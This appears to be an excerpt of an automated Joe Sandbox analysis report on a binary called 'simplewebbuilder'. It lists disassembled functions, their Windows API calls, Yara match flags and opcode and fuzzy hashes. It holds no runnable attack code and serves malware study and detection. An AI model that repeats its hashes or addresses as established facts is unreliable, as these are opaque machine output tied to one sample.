                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 009B4042
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 009B4049
                                                                                                                            • std::exception::exception.LIBCMT ref: 009B4063
                                                                                                                              • Part of subcall function 009BACC0: __EH_prolog.LIBCMT ref: 009BACC5
                                                                                                                              • Part of subcall function 009BACC0: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009BACD4
                                                                                                                              • Part of subcall function 009BACC0: __CxxThrowException@8.LIBCMT ref: 009BACF3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                                                            • String ID: bad allocation
                                                                                                                            • API String ID: 3112922283-2104205924
                                                                                                                            • Opcode ID: 5a57e866486a05c600b94b6c5cd32af3d46a82ef85c3e459a595e9eccde089b3
                                                                                                                            • Instruction ID: bb590d29177981436bb994b83bf781e80a048bce9d3aaecac58c05168721f367
                                                                                                                            • Opcode Fuzzy Hash: 5a57e866486a05c600b94b6c5cd32af3d46a82ef85c3e459a595e9eccde089b3
                                                                                                                            • Instruction Fuzzy Hash: 79F082B1D84309EFCB10EFE0D809BEEB778EB04341F40851AE515A2241DB745208DB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404EE6 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00404F3F
                                                                                                                            • GetFileType.KERNEL32(00000800), ref: 00404FE5
                                                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 0040503E
                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 0040504C
                                                                                                                            • SetHandleCount.KERNEL32 ref: 00405083
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1710529072-0
                                                                                                                            • Opcode ID: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
                                                                                                                            • Instruction ID: 0a81f0dcc5ba0bfdc0506c3f5ccff14beb01dd10c6f3c9adb059a1ad3e4abaaf
                                                                                                                            • Opcode Fuzzy Hash: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
                                                                                                                            • Instruction Fuzzy Hash: B851377190460A8BD7208F38CE8476B3B90EB51724F19473EE5A2F72E1D7389845CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C2280 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009C2050: CloseHandle.KERNEL32(00000000,C05FB8F7), ref: 009C20A1
                                                                                                                              • Part of subcall function 009C2050: WaitForSingleObject.KERNEL32(?,000000FF,C05FB8F7,?,?,?,?,C05FB8F7,009C2023,C05FB8F7), ref: 009C20B8
                                                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 009C231E
                                                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 009C233E
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 009C2377
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 009C23CB
                                                                                                                            • SetEvent.KERNEL32(?), ref: 009C23D2
                                                                                                                              • Part of subcall function 009B418C: CloseHandle.KERNEL32(00000000,?,009C2305), ref: 009B41B0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4166353394-0
                                                                                                                            • Opcode ID: ce8a6f612bfe5ba729f1c8d1669f871a15f0d9322a33533225ff95a3332ca7bc
                                                                                                                            • Instruction ID: bab9d64980fb177efa7d98a5f592329c153d24a5722ee5c1c8e51bd715f5ffff
                                                                                                                            • Opcode Fuzzy Hash: ce8a6f612bfe5ba729f1c8d1669f871a15f0d9322a33533225ff95a3332ca7bc
                                                                                                                            • Instruction Fuzzy Hash: F441F6709043519FEB159F28CC80B2B77A8EF45B20F14466DEC18DB296D739DC428BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B207C Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B20AC
                                                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009B20CD
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B20D8
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 009B213E
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B21A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1611172436-0
                                                                                                                            • Opcode ID: 25b401ee7726a50f965d33433f6a6ab639d25e1a3ef0d64bf08ad7217f893408
                                                                                                                            • Instruction ID: 1402bc47c4c366fbe1e402b702553712e4c147be4a03642f4a9be8f48fb61b9a
                                                                                                                            • Opcode Fuzzy Hash: 25b401ee7726a50f965d33433f6a6ab639d25e1a3ef0d64bf08ad7217f893408
                                                                                                                            • Instruction Fuzzy Hash: B5318C71108701AFC310DF29C985AABB7F9EFD8760F140A1EF49683651DB30E94ACB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BE6EE Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BE6F3
                                                                                                                              • Part of subcall function 009B1A01: TlsGetValue.KERNEL32 ref: 009B1A0A
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009BE772
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009BE78E
                                                                                                                            • InterlockedIncrement.KERNEL32(009E61A0), ref: 009BE7B3
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009BE7C8
                                                                                                                              • Part of subcall function 009B27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 009B284E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1578506061-0
                                                                                                                            • Opcode ID: b94eedbf1866e221b7654ed9c9083a937722ebbd71d4104b0eb47e4a8a0fa2e1
                                                                                                                            • Instruction ID: a249d1f7262bf0a08e2f03a19fb12920646f76e5b1f426f4eb4b91a3b0dffcea
                                                                                                                            • Opcode Fuzzy Hash: b94eedbf1866e221b7654ed9c9083a937722ebbd71d4104b0eb47e4a8a0fa2e1
                                                                                                                            • Instruction Fuzzy Hash: C43117719056489FCB10DFA8C944BEEBBF8FF48320F14855EE449E7641EB74AA04DBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B29EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2A3B
                                                                                                                            • closesocket.WS2_32 ref: 009B2A42
                                                                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 009B2A89
                                                                                                                            • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 009B2A97
                                                                                                                            • closesocket.WS2_32 ref: 009B2A9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1561005644-0
                                                                                                                            • Opcode ID: cdf74e53c67696927aa941276046df5b73f8c9030a06d7c058727f3c33bad341
                                                                                                                            • Instruction ID: 4530e2a7c5f490e7c5ab4398499e4711dcd7d262462f4ddedf6e7b818e208adb
                                                                                                                            • Opcode Fuzzy Hash: cdf74e53c67696927aa941276046df5b73f8c9030a06d7c058727f3c33bad341
                                                                                                                            • Instruction Fuzzy Hash: 4F212B71D04205AFCB24ABB88E45BAEB7EDDF84321F14456EE555C3192EA70CD40C761
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009D09A4 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 009D09B0
                                                                                                                              • Part of subcall function 009C35AC: __FF_MSGBANNER.LIBCMT ref: 009C35C3
                                                                                                                              • Part of subcall function 009C35AC: __NMSG_WRITE.LIBCMT ref: 009C35CA
                                                                                                                              • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF
                                                                                                                            • _free.LIBCMT ref: 009D09C3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: b415c0b15f413b93f4f9bf8ed72b89e8c191bbdac3c8aa699be194eb27d6ab92
                                                                                                                            • Instruction ID: 402f147cbf0385716931a0ad6dba1e909b12f2b8c1441c43dd8f689ad76b3728
                                                                                                                            • Opcode Fuzzy Hash: b415c0b15f413b93f4f9bf8ed72b89e8c191bbdac3c8aa699be194eb27d6ab92
                                                                                                                            • Instruction Fuzzy Hash: E311E731C997159ADB243FB0AC49F5A37989B94360F10C42BF9199B261DF348940D692
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B21D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B21DA
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B21ED
                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 009B2224
                                                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 009B2237
                                                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009B2261
                                                                                                                              • Part of subcall function 009B2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2350
                                                                                                                              • Part of subcall function 009B2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2360
                                                                                                                              • Part of subcall function 009B2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B2370
                                                                                                                              • Part of subcall function 009B2341: GetLastError.KERNEL32 ref: 009B237A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1856819132-0
                                                                                                                            • Opcode ID: 44e1303c698ff9981d1e0366ebf7ae462292f7ccfd01b86e9421278c3695820f
                                                                                                                            • Instruction ID: 055ac52fca2cdcb1fb99086a367515cf365ffde466eba6edadaaeb8ad1c743fc
                                                                                                                            • Opcode Fuzzy Hash: 44e1303c698ff9981d1e0366ebf7ae462292f7ccfd01b86e9421278c3695820f
                                                                                                                            • Instruction Fuzzy Hash: CA11DF71D04118EBCB049FA4DD04AFEBBB9FF44320F00852AE825E2271DB304A41EB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B229D
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B22B0
                                                                                                                            • TlsGetValue.KERNEL32 ref: 009B22E7
                                                                                                                            • TlsSetValue.KERNEL32(?), ref: 009B2300
                                                                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 009B231C
                                                                                                                              • Part of subcall function 009B2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2350
                                                                                                                              • Part of subcall function 009B2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2360
                                                                                                                              • Part of subcall function 009B2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B2370
                                                                                                                              • Part of subcall function 009B2341: GetLastError.KERNEL32 ref: 009B237A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1856819132-0
                                                                                                                            • Opcode ID: 1c109ff340c90fcebf98cdd7b6312d8c8e6939bc9a7ed8825e5f11e50efcecd4
                                                                                                                            • Instruction ID: 9446252d87c11d6c91105dee5cb1ecf588c60c8863793592d706c54c21471e3d
                                                                                                                            • Opcode Fuzzy Hash: 1c109ff340c90fcebf98cdd7b6312d8c8e6939bc9a7ed8825e5f11e50efcecd4
                                                                                                                            • Instruction Fuzzy Hash: F9119071D14218EBCB019FA5DC44AFEBFB9EF84360F00812AE814A3221CB754A55EB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BC308 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009BB75B: __EH_prolog.LIBCMT ref: 009BB760
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 009BC325
                                                                                                                              • Part of subcall function 009C4B5A: RaiseException.KERNEL32(?,?,009C0155,?,?,?,?,?,?,?,009C0155,?,009E1F98,?), ref: 009C4BAF
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,009E2DB4,?,00000001), ref: 009BC33B
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009BC34E
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,009E2DB4,?,00000001), ref: 009BC35E
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009BC36C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2725315915-0
                                                                                                                            • Opcode ID: d5ecb5f77ccf48272d03af38c9073f8c12dae3090190dc2d5dd467d72d883bac
                                                                                                                            • Instruction ID: 8c7d07c8208b876d1e38c9b632dbcd4441104b7dddb6a5c6e98977093aa6f316
                                                                                                                            • Opcode Fuzzy Hash: d5ecb5f77ccf48272d03af38c9073f8c12dae3090190dc2d5dd467d72d883bac
                                                                                                                            • Instruction Fuzzy Hash: 1E0181B6A54304AFDB10EFA4DC89FCB77ECEB04725F008525F625D7191DB60E8489710
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009B2432
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009B2445
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B2454
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B2469
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B2470
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 747265849-0
                                                                                                                            • Opcode ID: 89daf5614ac5141f8ef1ad9cff69343690c94f42d9886e459b62c548714a0314
                                                                                                                            • Instruction ID: 483d158884395c21bb4a9c78745a2a506d915cd304ea87e800e606c17d1ac194
                                                                                                                            • Opcode Fuzzy Hash: 89daf5614ac5141f8ef1ad9cff69343690c94f42d9886e459b62c548714a0314
                                                                                                                            • Instruction Fuzzy Hash: F9F09072281600BBD700ABA0ED89FD7772DFB44711F804012F701D64A1DF64B954DBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B1EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 009B1ED2
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 009B1EEA
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B1EF9
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B1F0E
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B1F15
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 830998967-0
                                                                                                                            • Opcode ID: 8742a14a8d2bd8536bbc090ba189b5305af3b8de1adb6168a3a62c5f017ff009
                                                                                                                            • Instruction ID: 6336244fc2bb6a5646c9bd7e3b72ad697636e797f235e67bc2f104ff9c48ee18
                                                                                                                            • Opcode Fuzzy Hash: 8742a14a8d2bd8536bbc090ba189b5305af3b8de1adb6168a3a62c5f017ff009
                                                                                                                            • Instruction Fuzzy Hash: 29F09A32256604BBD700AFA1ED88FD7BB2CFF08351F004016F20192462CB70A9A9DBE0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B8D45 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 58bc104d2e083ae9af0b242bf44697baf19feb154ac27c99577fde8e1ceb6b1d
                                                                                                                            • Instruction ID: d9386c6cb78afadedd3152567388f27f6b11ed70d5720799f08d6199a7965070
                                                                                                                            • Opcode Fuzzy Hash: 58bc104d2e083ae9af0b242bf44697baf19feb154ac27c99577fde8e1ceb6b1d
                                                                                                                            • Instruction Fuzzy Hash: 16419331700200ABDB24AE69D985AA7B7ADEB99764B140D2EF9558B3C1CF70E804CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B30AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B30C3
                                                                                                                            • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 009B3102
                                                                                                                            • _memcmp.LIBCMT ref: 009B3141
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressErrorLastString_memcmp
                                                                                                                            • String ID: 255.255.255.255
                                                                                                                            • API String ID: 1618111833-2422070025
                                                                                                                            • Opcode ID: a7aec726208b94422643305edaa6af73bbe7510d06e14ad226917b14d08eb683
                                                                                                                            • Instruction ID: 2b8d5f6399519300d98f591c72a407c6a44aec633366f3727dafffcf2ea12071
                                                                                                                            • Opcode Fuzzy Hash: a7aec726208b94422643305edaa6af73bbe7510d06e14ad226917b14d08eb683
                                                                                                                            • Instruction Fuzzy Hash: B431F371D043089FDB20EF68C981BAEB7A9AF41320F24892DE96597281DB719A418B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B1F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B1F5B
                                                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 009B1FC5
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 009B1FD2
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                                            • String ID: iocp
                                                                                                                            • API String ID: 998023749-976528080
                                                                                                                            • Opcode ID: efcdfe157258a9666c4001ad2b1def7b79fe8949f4cd5e155ede7d53fed8179e
                                                                                                                            • Instruction ID: c1e7919856470fa58e28e0d46289e89dbf04bbfa5a96171206ef58ac82a8d0a6
                                                                                                                            • Opcode Fuzzy Hash: efcdfe157258a9666c4001ad2b1def7b79fe8949f4cd5e155ede7d53fed8179e
                                                                                                                            • Instruction Fuzzy Hash: 1121E5B1801B44DFC720DF6AC54059AFBF8FFA4720B108A1FE4A683A60D7B0A604CF91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406BD7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,7U@ ,?,00000000,00000000,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CD0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 352835431-3990396050
                                                                                                                            • Opcode ID: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                            • Instruction ID: 3fc6234a2594f0c7c4f8fd7f4d61d5b765ea0d6a512059466152f22e4b19d7c1
                                                                                                                            • Opcode Fuzzy Hash: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                            • Instruction Fuzzy Hash: 2A112832900209ABDF228F94CE44ADEBBB6FF48350F154166FA61722A0D736CD71DB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C414C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 009C4164
                                                                                                                              • Part of subcall function 009C35AC: __FF_MSGBANNER.LIBCMT ref: 009C35C3
                                                                                                                              • Part of subcall function 009C35AC: __NMSG_WRITE.LIBCMT ref: 009C35CA
                                                                                                                              • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF
                                                                                                                            • std::exception::exception.LIBCMT ref: 009C4182
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 009C4197
                                                                                                                              • Part of subcall function 009C4B5A: RaiseException.KERNEL32(?,?,009C0155,?,?,?,?,?,?,?,009C0155,?,009E1F98,?), ref: 009C4BAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
